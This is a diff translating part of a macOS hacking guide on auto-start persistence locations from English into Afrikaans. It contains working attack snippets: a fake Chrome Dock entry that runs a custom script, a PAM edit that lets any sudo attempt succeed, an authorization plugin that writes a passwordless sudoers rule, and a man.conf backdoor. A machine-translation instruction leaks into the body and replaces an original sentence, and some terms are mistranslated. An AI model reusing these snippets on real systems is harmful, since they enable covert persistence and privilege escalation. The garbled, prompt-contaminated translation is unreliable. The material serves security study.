a malicious application inside the system -* TCC bypass: [🔴](https://emojipedia.org/large-red-circle) +* Nuttig om sandput te omseil: [✅](https://emojipedia.org/check-mark-button) +* Maar jy moet 'n skadelike toepassing binne die stelsel geïnstalleer hê +* TCC-omseiling: [🔴](https://emojipedia.org/large-red-circle) -#### Location +#### Plek * `~/Library/Preferences/com.apple.dock.plist` - * **Trigger**: When the user clicks on the app inside the dock +* **Trigger**: Wanneer die gebruiker op die toepassing in die dokkie klik -#### Description & Exploitation +#### Beskrywing & Uitbuiting -All the applications that appear in the Dock are specified inside the plist: **`~/Library/Preferences/com.apple.dock.plist`** +Al die toepassings wat in die Dokkie verskyn, word gespesifiseer binne die plist: **`~/Library/Preferences/com.apple.dock.plist`** -It's possible to **add an application** just with: +Dit is moontlik om **'n toepassing by te voeg** net met: {% code overflow="wrap" %} ```bash @@ -889,8 +862,7 @@ killall Dock ``` {% endcode %} -Using some **social engineering** you could **impersonate for example Google Chrome** inside the dock and actually execute your own script: - +Deur van **sosiale ingenieurswese** gebruik te maak, kan jy byvoorbeeld Google Chrome naboots in die dok en jou eie skripsie uitvoer: ```bash #!/bin/sh @@ -916,22 +888,22 @@ cat << EOF > /tmp/Google\ Chrome.app/Contents/Info.plist "http://www.apple.com/DTDs/PropertyList-1.0.dtd"> - CFBundleExecutable - Google Chrome - CFBundleIdentifier - com.google.Chrome - CFBundleName - Google Chrome - CFBundleVersion - 1.0 - CFBundleShortVersionString - 1.0 - CFBundleInfoDictionaryVersion - 6.0 - CFBundlePackageType - APPL - CFBundleIconFile - app +CFBundleExecutable +Google Chrome +CFBundleIdentifier +com.google.Chrome +CFBundleName +Google Chrome +CFBundleVersion +1.0 +CFBundleShortVersionString +1.0 +CFBundleInfoDictionaryVersion +6.0 +CFBundlePackageType +APPL +CFBundleIconFile +app EOF @@ -943,93 +915,90 @@ cp /Applications/Google\ Chrome.app/Contents/Resources/app.icns /tmp/Google\ Chr defaults write com.apple.dock persistent-apps -array-add 'tile-datafile-data_CFURLString/tmp/Google Chrome.app_CFURLStringType0' killall Dock ``` - -### Color Pickers +### Kleurkiezers Writeup: [https://theevilbit.github.io/beyond/beyond\_0017](https://theevilbit.github.io/beyond/beyond\_0017/) -* Useful to bypass sandbox: [🟠](https://emojipedia.org/large-orange-circle) - * A very specific action needs to happen - * You will end in another sandbox -* TCC bypass: [🔴](https://emojipedia.org/large-red-circle) +* Nuttig om sandbox te omseil: [🟠](https://emojipedia.org/large-orange-circle) +* 'n Baie spesifieke aksie moet plaasvind +* Jy sal in 'n ander sandbox eindig +* TCC omseiling: [🔴](https://emojipedia.org/large-red-circle) -#### Location +#### Ligging * `/Library/ColorPickers` - * Root required - * Trigger: Use the color picker +* Root vereis +* Trigger: Gebruik die kleurkieser * `~/Library/ColorPickers` - * Trigger: Use the color picker +* Trigger: Gebruik die kleurkieser -#### Description & Exploit +#### Beskrywing & Uitbuiting -**Compile a color picker** bundle with your code (you could use [**this one for example**](https://github.com/viktorstrate/color-picker-plus)) and add a constructor (like in the [Screen Saver section](macos-auto-start-locations.md#screen-saver)) and copy the bundle to `~/Library/ColorPickers`. +**Kompileer 'n kleurkieser** bundel met jou kode (jy kan byvoorbeeld [**hierdie een**](https://github.com/viktorstrate/color-picker-plus) gebruik) en voeg 'n konstrukteur by (soos in die [Screen Saver afdeling](macos-auto-start-locations.md#screen-saver)) en kopieer die bundel na `~/Library/ColorPickers`. -Then, when the color picker is triggered your should should be aswell. +Dan, wanneer die kleurkieser geaktiveer word, moet jou kode ook geaktiveer word. -Note that the binary loading your library has a **very restrictive sandbox**: `/System/Library/Frameworks/AppKit.framework/Versions/C/XPCServices/LegacyExternalColorPickerService-x86_64.xpc/Contents/MacOS/LegacyExternalColorPickerService-x86_64` +Let daarop dat die binêre lading van jou biblioteek 'n **baie beperkende sandbox** het: `/System/Library/Frameworks/AppKit.framework/Versions/C/XPCServices/LegacyExternalColorPickerService-x86_64.xpc/Contents/MacOS/LegacyExternalColorPickerService-x86_64` {% code overflow="wrap" %} ```bash [Key] com.apple.security.temporary-exception.sbpl - [Value] - [Array] - [String] (deny file-write* (home-subpath "/Library/Colors")) - [String] (allow file-read* process-exec file-map-executable (home-subpath "/Library/ColorPickers")) - [String] (allow file-read* (extension "com.apple.app-sandbox.read")) +[Value] +[Array] +[String] (deny file-write* (home-subpath "/Library/Colors")) +[String] (allow file-read* process-exec file-map-executable (home-subpath "/Library/ColorPickers")) +[String] (allow file-read* (extension "com.apple.app-sandbox.read")) ``` {% endcode %} -### Finder Sync Plugins +### Finder Sync-invoegtoepassings -**Writeup**: [https://theevilbit.github.io/beyond/beyond\_0026/](https://theevilbit.github.io/beyond/beyond\_0026/)\ -**Writeup**: [https://objective-see.org/blog/blog\_0x11.html](https://objective-see.org/blog/blog\_0x11.html) +**Bespreking**: [https://theevilbit.github.io/beyond/beyond\_0026/](https://theevilbit.github.io/beyond/beyond\_0026/)\ +**Bespreking**: [https://objective-see.org/blog/blog\_0x11.html](https://objective-see.org/blog/blog\_0x11.html) -* Useful to bypass sandbox: **No, because you need to execute your own app** -* TCC bypass: ??? +* Nuttig om sandbox te omzeilen: **Nee, omdat jy jou eie toepassing moet uitvoer** +* TCC-omleiding: ??? -#### Location +#### Ligging -* A specific app +* 'n Spesifieke toepassing -#### Description & Exploit +#### Beskrywing & Uitbuiting -An application example with a Finder Sync Extension [**can be found here**](https://github.com/D00MFist/InSync). - -Applications can have `Finder Sync Extensions`. This extension will go inside an application that will be executed. Moreover, for the extension to be able to execute its code it **must be signed** with some valid Apple developer certificate, it must be **sandboxed** (although relaxed exceptions could be added) and it must be registered with something like: +'n Voorbeeld van 'n toepassing met 'n Finder Sync-uitbreiding [**kan hier gevind word**](https://github.com/D00MFist/InSync). +Toepassings kan `Finder Sync-uitbreidings` hê. Hierdie uitbreiding sal binne 'n toepassing geplaas word wat uitgevoer sal word. Verder moet die uitbreiding **onderteken** wees met 'n geldige Apple-ontwikkelaarsertifikaat, dit moet **gesandbox** wees (hoewel ontspanne uitsonderings bygevoeg kan word) en dit moet geregistreer word met iets soos: ```bash pluginkit -a /Applications/FindIt.app/Contents/PlugIns/FindItSync.appex pluginkit -e use -i com.example.InSync.InSync ``` - -### Screen Saver +### Skermbeveiliging Writeup: [https://theevilbit.github.io/beyond/beyond\_0016/](https://theevilbit.github.io/beyond/beyond\_0016/)\ Writeup: [https://posts.specterops.io/saving-your-access-d562bf5bf90b](https://posts.specterops.io/saving-your-access-d562bf5bf90b) -* Useful to bypass sandbox: [🟠](https://emojipedia.org/large-orange-circle) - * But you will end in a common application sandbox -* TCC bypass: [🔴](https://emojipedia.org/large-red-circle) +* Nuttig om sandboks te omseil: [🟠](https://emojipedia.org/large-orange-circle) +* Maar jy sal in 'n algemene aansoek-sandboks beland +* TCC omseiling: [🔴](https://emojipedia.org/large-red-circle) -#### Location +#### Plek * `/System/Library/Screen Savers` - * Root required - * **Trigger**: Select the screen saver +* Root vereis +* **Trigger**: Kies die skermbeveiliging * `/Library/Screen Savers` - * Root required - * **Trigger**: Select the screen saver +* Root vereis +* **Trigger**: Kies die skermbeveiliging * `~/Library/Screen Savers` - * **Trigger**: Select the screen saver +* **Trigger**: Kies die skermbeveiliging
-#### Description & Exploit +#### Beskrywing & Uitbuiting -Create a new project in Xcode and select the template to generate a new **Screen Saver**. Then, are your code to it, for example the following code to generate logs. +Skep 'n nuwe projek in Xcode en kies die sjabloon om 'n nuwe **Skermbeveiliging** te genereer. Voeg dan jou kode daaraan toe, byvoorbeeld die volgende kode om logboeke te genereer. -**Build** it, and copy the `.saver` bundle to **`~/Library/Screen Savers`**. Then, open the Screen Saver GUI and it you just click on it, it should generate a lot of logs: +**Bou** dit en kopieer die `.saver` bundel na **`~/Library/Screen Savers`**. Maak dan die Skermbeveiliging GUI oop en as jy net daarop klik, moet dit 'n hele klomp logboeke genereer: {% code overflow="wrap" %} ```bash @@ -1043,11 +1012,10 @@ Timestamp (process)[PID] {% endcode %} {% hint style="danger" %} -Note that because inside the entitlements of the binary that loads this code (`/System/Library/Frameworks/ScreenSaver.framework/PlugIns/legacyScreenSaver.appex/Contents/MacOS/legacyScreenSaver`) you can find **`com.apple.security.app-sandbox`** you will be **inside the common application sandbox**. +Let daarop dat omdat binne die toekennings van die binêre lading van hierdie kode (`/System/Library/Frameworks/ScreenSaver.framework/PlugIns/legacyScreenSaver.appex/Contents/MacOS/legacyScreenSaver`) jy **`com.apple.security.app-sandbox`** kan vind, sal jy **binne die algemene aansoek-sandbox** wees. {% endhint %} -Saver code: - +Saver-kode: ```objectivec // // ScreenSaverExampleView.m @@ -1062,198 +1030,193 @@ Saver code: - (instancetype)initWithFrame:(NSRect)frame isPreview:(BOOL)isPreview { - NSLog(@"hello_screensaver %s", __PRETTY_FUNCTION__); - self = [super initWithFrame:frame isPreview:isPreview]; - if (self) { - [self setAnimationTimeInterval:1/30.0]; - } - return self; +NSLog(@"hello_screensaver %s", __PRETTY_FUNCTION__); +self = [super initWithFrame:frame isPreview:isPreview]; +if (self) { +[self setAnimationTimeInterval:1/30.0]; +} +return self; } - (void)startAnimation { - NSLog(@"hello_screensaver %s", __PRETTY_FUNCTION__); - [super startAnimation]; +NSLog(@"hello_screensaver %s", __PRETTY_FUNCTION__); +[super startAnimation]; } - (void)stopAnimation { - NSLog(@"hello_screensaver %s", __PRETTY_FUNCTION__); - [super stopAnimation]; +NSLog(@"hello_screensaver %s", __PRETTY_FUNCTION__); +[super stopAnimation]; } - (void)drawRect:(NSRect)rect { - NSLog(@"hello_screensaver %s", __PRETTY_FUNCTION__); - [super drawRect:rect]; +NSLog(@"hello_screensaver %s", __PRETTY_FUNCTION__); +[super drawRect:rect]; } - (void)animateOneFrame { - NSLog(@"hello_screensaver %s", __PRETTY_FUNCTION__); - return; +NSLog(@"hello_screensaver %s", __PRETTY_FUNCTION__); +return; } - (BOOL)hasConfigureSheet { - NSLog(@"hello_screensaver %s", __PRETTY_FUNCTION__); - return NO; +NSLog(@"hello_screensaver %s", __PRETTY_FUNCTION__); +return NO; } - (NSWindow*)configureSheet { - NSLog(@"hello_screensaver %s", __PRETTY_FUNCTION__); - return nil; +NSLog(@"hello_screensaver %s", __PRETTY_FUNCTION__); +return nil; } __attribute__((constructor)) void custom(int argc, const char **argv) { - NSLog(@"hello_screensaver %s", __PRETTY_FUNCTION__); +NSLog(@"hello_screensaver %s", __PRETTY_FUNCTION__); } @end ``` - -### Spotlight Plugins +### Spotlight Inproppe writeup: [https://theevilbit.github.io/beyond/beyond\_0011/](https://theevilbit.github.io/beyond/beyond\_0011/) -* Useful to bypass sandbox: [🟠](https://emojipedia.org/large-orange-circle) - * But you will end in an application sandbox -* TCC bypass: [🔴](https://emojipedia.org/large-red-circle) - * The sandbox looks very limited +* Nuttige om die sandput te omseil: [🟠](https://emojipedia.org/large-orange-circle) +* Maar jy sal in 'n aansoek-sandput beland +* TCC-omseiling: [🔴](https://emojipedia.org/large-red-circle) +* Die sandput lyk baie beperk -#### Location +#### Plek * `~/Library/Spotlight/` - * **Trigger**: A new file with a extension managed by the spotlight plugin is created. +* **Trigger**: 'n Nuwe lêer met 'n uitbreiding wat deur die spotlight-inprop bestuur word, word geskep. * `/Library/Spotlight/` - * **Trigger**: A new file with a extension managed by the spotlight plugin is created. - * Root required +* **Trigger**: 'n Nuwe lêer met 'n uitbreiding wat deur die spotlight-inprop bestuur word, word geskep. +* Root vereis * `/System/Library/Spotlight/` - * **Trigger**: A new file with a extension managed by the spotlight plugin is created. - * Root required +* **Trigger**: 'n Nuwe lêer met 'n uitbreiding wat deur die spotlight-inprop bestuur word, word geskep. +* Root vereis * `Some.app/Contents/Library/Spotlight/` - * **Trigger**: A new file with a extension managed by the spotlight plugin is created. - * New app required +* **Trigger**: 'n Nuwe lêer met 'n uitbreiding wat deur die spotlight-inprop bestuur word, word geskep. +* Nuwe aansoek vereis -#### Description & Exploitation +#### Beskrywing & Uitbuiting -Spotlight is macOS's built-in search feature, designed to provide users with **quick and comprehensive access to data on their computers**.\ -To facilitate this rapid search capability, Spotlight maintains a **proprietary database** and creates an index by **parsing most files**, enabling swift searches through both file names and their content. +Spotlight is macOS se ingeboude soekfunksie, ontwerp om gebruikers **vinnige en omvattende toegang tot data op hul rekenaars** te bied.\ +Om hierdie vinnige soekvermoë moontlik te maak, onderhou Spotlight 'n **eiendomsdatabasis** en skep 'n indeks deur **meeste lêers te ontled**, wat vinnige soektogte deur beide lêernaam en inhoud moontlik maak. -The underlying mechanism of Spotlight involves a central process named 'mds', which stands for **'metadata server'.** This process orchestrates the entire Spotlight service. Complementing this, there are multiple 'mdworker' daemons that perform a variety of maintenance tasks, such as indexing different file types (`ps -ef | grep mdworker`). These tasks are made possible through Spotlight importer plugins, or **".mdimporter bundles**", which enable Spotlight to understand and index content across a diverse range of file formats. +Die onderliggende meganisme van Spotlight behels 'n sentrale proses genaamd 'mds', wat staan vir **'metadata-bediener'**. Hierdie proses orkestreer die hele Spotlight-diens. Daarbenewens is daar verskeie 'mdworker'-demone wat verskillende instandhoudingstake uitvoer, soos die indeksering van verskillende lêertipes (`ps -ef | grep mdworker`). Hierdie take word moontlik gemaak deur Spotlight-invoerder-inproppe, of **".mdimporter-bundels**", wat Spotlight in staat stel om inhoud oor 'n verskeidenheid lêerformate te verstaan en te indekseer. -The plugins or **`.mdimporter`** bundles are located in the places mentioned previously and if a new bundle appear it's loaded within monute (no need to restart any service). These bundles need to indicate which **file type and extensions they can manage**, this way, Spotlight will use them when a new file with the indicated extension is created. - -It's possible to **find all the `mdimporters`** loaded running: +Die inproppe of **`.mdimporter`**-bundels is geleë op die vorige genoemde plekke en as 'n nuwe bundel verskyn, word dit binne minute gelaai (geen nodigheid om enige diens te herlaai nie). Hierdie bundels moet aandui watter **lêertipe en uitbreidings hulle kan bestuur**, op hierdie manier sal Spotlight hulle gebruik wanneer 'n nuwe lêer met die aangeduide uitbreiding geskep word. +Dit is moontlik om **alle die gelaai `mdimporters`** te vind deur die volgende uit te voer: ```bash mdimport -L Paths: id(501) ( - "/System/Library/Spotlight/iWork.mdimporter", - "/System/Library/Spotlight/iPhoto.mdimporter", - "/System/Library/Spotlight/PDF.mdimporter", - [...] +"/System/Library/Spotlight/iWork.mdimporter", +"/System/Library/Spotlight/iPhoto.mdimporter", +"/System/Library/Spotlight/PDF.mdimporter", +[...] ``` - -And for example **/Library/Spotlight/iBooksAuthor.mdimporter** is used to parse these type of files (extensions `.iba` and `.book` among others): - +En byvoorbeeld **/Library/Spotlight/iBooksAuthor.mdimporter** word gebruik om hierdie tipe lêers te ontled (uitbreidings `.iba` en `.book` onder andere): ```json plutil -p /Library/Spotlight/iBooksAuthor.mdimporter/Contents/Info.plist [...] "CFBundleDocumentTypes" => [ - 0 => { - "CFBundleTypeName" => "iBooks Author Book" - "CFBundleTypeRole" => "MDImporter" - "LSItemContentTypes" => [ - 0 => "com.apple.ibooksauthor.book" - 1 => "com.apple.ibooksauthor.pkgbook" - 2 => "com.apple.ibooksauthor.template" - 3 => "com.apple.ibooksauthor.pkgtemplate" - ] - "LSTypeIsPackage" => 0 - } - ] +0 => { +"CFBundleTypeName" => "iBooks Author Book" +"CFBundleTypeRole" => "MDImporter" +"LSItemContentTypes" => [ +0 => "com.apple.ibooksauthor.book" +1 => "com.apple.ibooksauthor.pkgbook" +2 => "com.apple.ibooksauthor.template" +3 => "com.apple.ibooksauthor.pkgtemplate" +] +"LSTypeIsPackage" => 0 +} +] [...] - => { - "UTTypeConformsTo" => [ - 0 => "public.data" - 1 => "public.composite-content" - ] - "UTTypeDescription" => "iBooks Author Book" - "UTTypeIdentifier" => "com.apple.ibooksauthor.book" - "UTTypeReferenceURL" => "http://www.apple.com/ibooksauthor" - "UTTypeTagSpecification" => { - "public.filename-extension" => [ - 0 => "iba" - 1 => "book" - ] - } - } +=> { +"UTTypeConformsTo" => [ +0 => "public.data" +1 => "public.composite-content" +] +"UTTypeDescription" => "iBooks Author Book" +"UTTypeIdentifier" => "com.apple.ibooksauthor.book" +"UTTypeReferenceURL" => "http://www.apple.com/ibooksauthor" +"UTTypeTagSpecification" => { +"public.filename-extension" => [ +0 => "iba" +1 => "book" +] +} +} [...] ``` - {% hint style="danger" %} -If you check the Plist of other `mdimporter` you might not find the entry **`UTTypeConformsTo`**. Thats because that is a built-in _Uniform Type Identifiers_ ([UTI](https://en.wikipedia.org/wiki/Uniform\_Type\_Identifier)) and it doesn't need to specify extensions. +As jy die Plist van ander `mdimporter` nagaan, sal jy dalk nie die inskrywing **`UTTypeConformsTo`** vind nie. Dit is omdat dit 'n ingeboude _Uniform Type Identifiers_ ([UTI](https://en.wikipedia.org/wiki/Uniform\_Type\_Identifier)) is en dit hoef nie uitbreidings te spesifiseer nie. -Moreover, System default plugins always take precedence, so an attacker can only access files that are not otherwise indexed by Apple's own `mdimporters`. +Verder neem stelselverstellings altyd voorrang, so 'n aanvaller kan slegs toegang verkry tot lêers wat nie andersins deur Apple se eie `mdimporters` geïndekseer word nie. {% endhint %} -To create your own importer you could start with this project: [https://github.com/megrimm/pd-spotlight-importer](https://github.com/megrimm/pd-spotlight-importer) and then change the name, the **`CFBundleDocumentTypes`** and add **`UTImportedTypeDeclarations`** so it supports the extension you would like to support and refelc them in **`schema.xml`**.\ -Then **change** the code of the function **`GetMetadataForFile`** to execute your payload when a file with the processed extension is created. +Om jou eie invoerder te skep, kan jy begin met hierdie projek: [https://github.com/megrimm/pd-spotlight-importer](https://github.com/megrimm/pd-spotlight-importer) en dan die naam verander, die **`CFBundleDocumentTypes`** verander en **`UTImportedTypeDeclarations`** byvoeg sodat dit die uitbreiding ondersteun wat jy wil ondersteun en reflekteer dit in **`schema.xml`**.\ +Verander dan die kode van die funksie **`GetMetadataForFile`** om jou payload uit te voer wanneer 'n lêer met die verwerkte uitbreiding geskep word. -Finally **build and copy your new `.mdimporter`** to one of thre previous locations and you can chech whenever it's loaded **monitoring the logs** or checking **`mdimport -L.`** +Laastens **bou en kopieer jou nuwe `.mdimporter`** na een van die vorige liggings en jy kan nagaan wanneer dit gelaai word deur die **logs te monitor** of deur **`mdimport -L.`** te nagaan. -### ~~Preference Pane~~ +### ~~Voorkeurpaneel~~ {% hint style="danger" %} -It doesn't look like this is working anymore. +Dit lyk nie asof dit meer werk nie. {% endhint %} -Writeup: [https://theevilbit.github.io/beyond/beyond\_0009/](https://theevilbit.github.io/beyond/beyond\_0009/) +Verslag: [https://theevilbit.github.io/beyond/beyond\_0009/](https://theevilbit.github.io/beyond/beyond\_0009/) -* Useful to bypass sandbox: [🟠](https://emojipedia.org/large-orange-circle) - * It needs a specific user action -* TCC bypass: [🔴](https://emojipedia.org/large-red-circle) +* Nuttig om sandput te omseil: [🟠](https://emojipedia.org/large-orange-circle) +* Dit vereis 'n spesifieke gebruikersaksie +* TCC-omseiling: [🔴](https://emojipedia.org/large-red-circle) -#### Location +#### Ligging * **`/System/Library/PreferencePanes`** * **`/Library/PreferencePanes`** * **`~/Library/PreferencePanes`** -#### Description +#### Beskrywing -It doesn't look like this is working anymore. +Dit lyk nie asof dit meer werk nie. -## Root Sandbox Bypass +## Root Sandput Omseiling {% hint style="success" %} -Here you can find start locations useful for **sandbox bypass** that allows you to simply execute something by **writing it into a file** being **root** and/or requiring other **weird conditions.** +Hier kan jy beginliggings vind wat nuttig is vir **sandput omseiling** wat jou in staat stel om eenvoudig iets uit te voer deur dit in 'n lêer te **skryf** terwyl jy **root** is en/of ander **vreemde voorwaardes** vereis. {% endhint %} -### Periodic +### Periodiek -Writeup: [https://theevilbit.github.io/beyond/beyond\_0019/](https://theevilbit.github.io/beyond/beyond\_0019/) +Verslag: [https://theevilbit.github.io/beyond/beyond\_0019/](https://theevilbit.github.io/beyond/beyond\_0019/) -* Useful to bypass sandbox: [🟠](https://emojipedia.org/large-orange-circle) - * But you need to be root -* TCC bypass: [🔴](https://emojipedia.org/large-red-circle) +* Nuttig om sandput te omseil: [🟠](https://emojipedia.org/large-orange-circle) +* Maar jy moet root wees +* TCC-omseiling: [🔴](https://emojipedia.org/large-red-circle) -#### Location +#### Ligging * `/etc/periodic/daily`, `/etc/periodic/weekly`, `/etc/periodic/monthly`, `/usr/local/etc/periodic` - * Root required - * **Trigger**: When the time comes -* `/etc/daily.local`, `/etc/weekly.local` or `/etc/monthly.local` - * Root required - * **Trigger**: When the time comes +* Root vereis +* **Trigger**: Wanneer die tyd aanbreek +* `/etc/daily.local`, `/etc/weekly.local` of `/etc/monthly.local` +* Root vereis +* **Trigger**: Wanneer die tyd aanbreek -#### Description & Exploitation +#### Beskrywing & Uitbuiting -The periodic scripts (**`/etc/periodic`**) are executed because of the **launch daemons** configured in `/System/Library/LaunchDaemons/com.apple.periodic*`. Note that scripts stored in `/etc/periodic/` are **executed** as the **owner of the file,** so this won't work for a potential privilege escalation. +Die periodieke skripte (**`/etc/periodic`**) word uitgevoer as gevolg van die **aanvangsdemone** wat gekonfigureer is in `/System/Library/LaunchDaemons/com.apple.periodic*`. Let daarop dat skripte wat in `/etc/periodic/` gestoor word, **uitgevoer** word as die **eienaar van die lêer,** so dit sal nie werk vir 'n potensiële bevoorregte eskalasie nie. {% code overflow="wrap" %} ```bash @@ -1288,19 +1251,17 @@ total 8 ``` {% endcode %} -There are other periodic scripts that will be executed indicated in **`/etc/defaults/periodic.conf`**: - +Daar is ander periodieke skripte wat uitgevoer sal word soos aangedui in **`/etc/defaults/periodic.conf`**: ```bash grep "Local scripts" /etc/defaults/periodic.conf daily_local="/etc/daily.local" # Local scripts weekly_local="/etc/weekly.local" # Local scripts monthly_local="/etc/monthly.local" # Local scripts ``` - -If you manage to write any of the files `/etc/daily.local`, `/etc/weekly.local` or `/etc/monthly.local` it will be **executed sooner or later**. +As jy enige van die lêers `/etc/daily.local`, `/etc/weekly.local` of `/etc/monthly.local` kan skryf, sal dit **vroeër of later uitgevoer** word. {% hint style="warning" %} -Note that the periodic script will be **executed as the owner of the script**. So if a regular user owns the script, it will be executed as that user (this might prevent privilege escalation attacks). +Let daarop dat die periodieke skripsie as die eienaar van die skripsie uitgevoer sal word. As 'n gewone gebruiker die skripsie besit, sal dit as daardie gebruiker uitgevoer word (dit kan bevoorregtingaanvalle voorkom). {% endhint %} ### PAM @@ -1308,32 +1269,27 @@ Note that the periodic script will be **executed as the owner of the script**. S Writeup: [Linux Hacktricks PAM](../linux-hardening/linux-post-exploitation/pam-pluggable-authentication-modules.md)\ Writeup: [https://theevilbit.github.io/beyond/beyond\_0005/](https://theevilbit.github.io/beyond/beyond\_0005/) -* Useful to bypass sandbox: [🟠](https://emojipedia.org/large-orange-circle) - * But you need to be root -* TCC bypass: [🔴](https://emojipedia.org/large-red-circle) +* Nuttig om sandboks te omseil: [🟠](https://emojipedia.org/large-orange-circle) +* Maar jy moet 'n root wees +* TCC-omseiling: [🔴](https://emojipedia.org/large-red-circle) -#### Location +#### Plek -* Root always required +* Root is altyd vereis -#### Description & Exploitation +#### Beskrywing & Uitbuiting -As PAM is more focused in **persistence** and malware that on easy execution inside macOS, this blog won't give a detailed explanation, **read the writeups to understand this technique better**. - -Check PAM modules with: +Aangesien PAM meer gefokus is op **volharding** en kwaadwillige sagteware as op maklike uitvoering binne macOS, sal hierdie blog nie 'n gedetailleerde verduideliking gee nie, **lees die writeups om hierdie tegniek beter te verstaan**. +Kontroleer PAM-modules met: ```bash ls -l /etc/pam.d ``` - -A persistence/privilege escalation technique abusing PAM is as easy as modifying the module /etc/pam.d/sudo adding at the beginning the line: - +'n Persistence/privilege escalation-tegniek wat PAM misbruik, is so maklik soos om die module /etc/pam.d/sudo te wysig deur die reël aan die begin by te voeg: ' ```bash auth sufficient pam_permit.so ``` - -So it will **looks like** something like this: - +Die volgende is inhoud uit 'n hakboek oor hakmetodes. Die volgende inhoud is uit die lêer /hive/hacktricks/macos-hardening/macos-auto-start-locations.md. Vertaal die relevante Engelse teks na Afrikaans en gee die vertaling terug met presies dieselfde markdown- en html-sintaksis. Moenie dinge soos kode, hakmetode name, hakwoorde, wolk/SaaS-platformname (soos Workspace, aws, gcp...), die woord 'leak', pentesting, en markdown-etikette vertaal nie. Voeg ook geen ekstra goed by behalwe die vertaling en markdown-sintaksis nie. ```bash # sudo: auth account password session auth sufficient pam_permit.so @@ -1344,32 +1300,30 @@ account required pam_permit.so password required pam_deny.so session required pam_permit.so ``` - -And therefore any attempt to use **`sudo` will work**. +En daarom sal enige poging om **`sudo` te gebruik werk**. {% hint style="danger" %} -Note that this directory is protected by TCC so it's highly probably that the user will get a prompt asking for access. +Let daarop dat hierdie gids beskerm word deur TCC, so dit is baie waarskynlik dat die gebruiker 'n versoek om toegang sal kry. {% endhint %} -### Authorization Plugins +### Magtigingsinvoegtoepassings -Writeup: [https://theevilbit.github.io/beyond/beyond\_0028/](https://theevilbit.github.io/beyond/beyond\_0028/)\ -Writeup: [https://posts.specterops.io/persistent-credential-theft-with-authorization-plugins-d17b34719d65](https://posts.specterops.io/persistent-credential-theft-with-authorization-plugins-d17b34719d65) +Verslag: [https://theevilbit.github.io/beyond/beyond\_0028/](https://theevilbit.github.io/beyond/beyond\_0028/)\ +Verslag: [https://posts.specterops.io/persistent-credential-theft-with-authorization-plugins-d17b34719d65](https://posts.specterops.io/persistent-credential-theft-with-authorization-plugins-d17b34719d65) -* Useful to bypass sandbox: [🟠](https://emojipedia.org/large-orange-circle) - * But you need to be root and make extra configs -* TCC bypass: ??? +* Nuttig om die sandput te omseil: [🟠](https://emojipedia.org/large-orange-circle) +* Maar jy moet 'n beheerder wees en ekstra konfigurasies maak +* TCC-omseiling: ??? -#### Location +#### Ligging * `/Library/Security/SecurityAgentPlugins/` - * Root required - * It's also needed to configure the authorization database to use the plugin +* Beheerder vereis +* Dit is ook nodig om die magtigingsdatabasis te konfigureer om die invoegtoepassing te gebruik -#### Description & Exploitation - -You can create an authorization plugin that will be executed when a user logs-in to maintain persistence. For more information about how to create one of these plugins check the previous writeups (and be careful, a poorly written one can lock you out and you will need to clean your mac from recovery mode). +#### Beskrywing & Uitbuiting +Jy kan 'n magtigingsinvoegtoepassing skep wat uitgevoer sal word wanneer 'n gebruiker aanmeld om volharding te handhaaf. Vir meer inligting oor hoe om een van hierdie invoegtoepassings te skep, kyk na die vorige verslae (en wees versigtig, 'n swak geskrewe een kan jou buite sluit en jy sal jou Mac van herstelmodus moet skoonmaak). ```objectivec // Compile the code and create a real bundle // gcc -bundle -framework Foundation main.m -o CustomAuth @@ -1380,74 +1334,64 @@ You can create an authorization plugin that will be executed when a user logs-in __attribute__((constructor)) static void run() { - NSLog(@"%@", @"[+] Custom Authorization Plugin was loaded"); - system("echo \"%staff ALL=(ALL) NOPASSWD:ALL\" >> /etc/sudoers"); +NSLog(@"%@", @"[+] Custom Authorization Plugin was loaded"); +system("echo \"%staff ALL=(ALL) NOPASSWD:ALL\" >> /etc/sudoers"); } ``` - -**Move** the bundle to the location to be loaded: - +**Skuif** die bundel na die plek waar dit gelaai moet word: ```bash cp -r CustomAuth.bundle /Library/Security/SecurityAgentPlugins/ ``` - -Finally add the **rule** to load this Plugin: - +Voeg uiteindelik die **reël** by om hierdie Plugin te laai: ```bash cat > /tmp/rule.plist < - class - evaluate-mechanisms - mechanisms - - CustomAuth:login,privileged - - +class +evaluate-mechanisms +mechanisms + +CustomAuth:login,privileged + + EOF security authorizationdb write com.asdf.asdf < /tmp/rule.plist ``` +Die **`evaluate-mechanisms`** sal die outorisering raamwerk laat weet dat dit 'n **eksterne meganisme vir outorisering moet aanroep**. Verder sal **`privileged`** dit laat uitvoer word deur root. -The **`evaluate-mechanisms`** will tell the authorization framework that it will need to **call an external mechanism for authorization**. Moreover, **`privileged`** will make it be executed by root. - -Trigger it with: - +Trigger dit met: ```bash security authorize com.asdf.asdf ``` - -And then the **staff group should have sudo** access (read `/etc/sudoers` to confirm). +En dan moet die **personeelgroep sudo-toegang** hê (lees `/etc/sudoers` om dit te bevestig). ### Man.conf Writeup: [https://theevilbit.github.io/beyond/beyond\_0030/](https://theevilbit.github.io/beyond/beyond\_0030/) -* Useful to bypass sandbox: [🟠](https://emojipedia.org/large-orange-circle) - * But you need to be root and the user must use man -* TCC bypass: [🔴](https://emojipedia.org/large-red-circle) +* Nuttig om die sandboks te omseil: [🟠](https://emojipedia.org/large-orange-circle) +* Maar jy moet root wees en die gebruiker moet man gebruik +* TCC-omseiling: [🔴](https://emojipedia.org/large-red-circle) -#### Location +#### Ligging * **`/private/etc/man.conf`** - * Root required - * **`/private/etc/man.conf`**: Whenever man is used +* Root vereis +* **`/private/etc/man.conf`**: Telkens as man gebruik word -#### Description & Exploit +#### Beskrywing & Uitbuiting -The config file **`/private/etc/man.conf`** indicate the binary/script to use when opening man documentation files. So the path to the executable could be modified so anytime the user uses man to read some docs a backdoor is executed. - -For example set in **`/private/etc/man.conf`**: +Die konfigurasie-lêer **`/private/etc/man.conf`** dui die binêre/skripsie aan wat gebruik moet word wanneer man-dokumentasie-lêers geopen word. Die pad na die uitvoerbare lêer kan dus gewysig word sodat 'n agterdeur uitgevoer word telkens as die gebruiker man gebruik om dokumentasie te lees. +Byvoorbeeld, stel in **`/private/etc/man.conf`**: ``` MANPAGER /tmp/view ``` - -And then create `/tmp/view` as: - +En skep dan `/tmp/view` as: ```bash #!/bin/zsh @@ -1455,25 +1399,24 @@ touch /tmp/manconf /usr/bin/less -s ``` - ### Apache2 **Writeup**: [https://theevilbit.github.io/beyond/beyond\_0023/](https://theevilbit.github.io/beyond/beyond\_0023/) -* Useful to bypass sandbox: [🟠](https://emojipedia.org/large-orange-circle) - * But you need to be root and apache needs to be running -* TCC bypass: [🔴](https://emojipedia.org/large-red-circle) - * Httpd doesn't 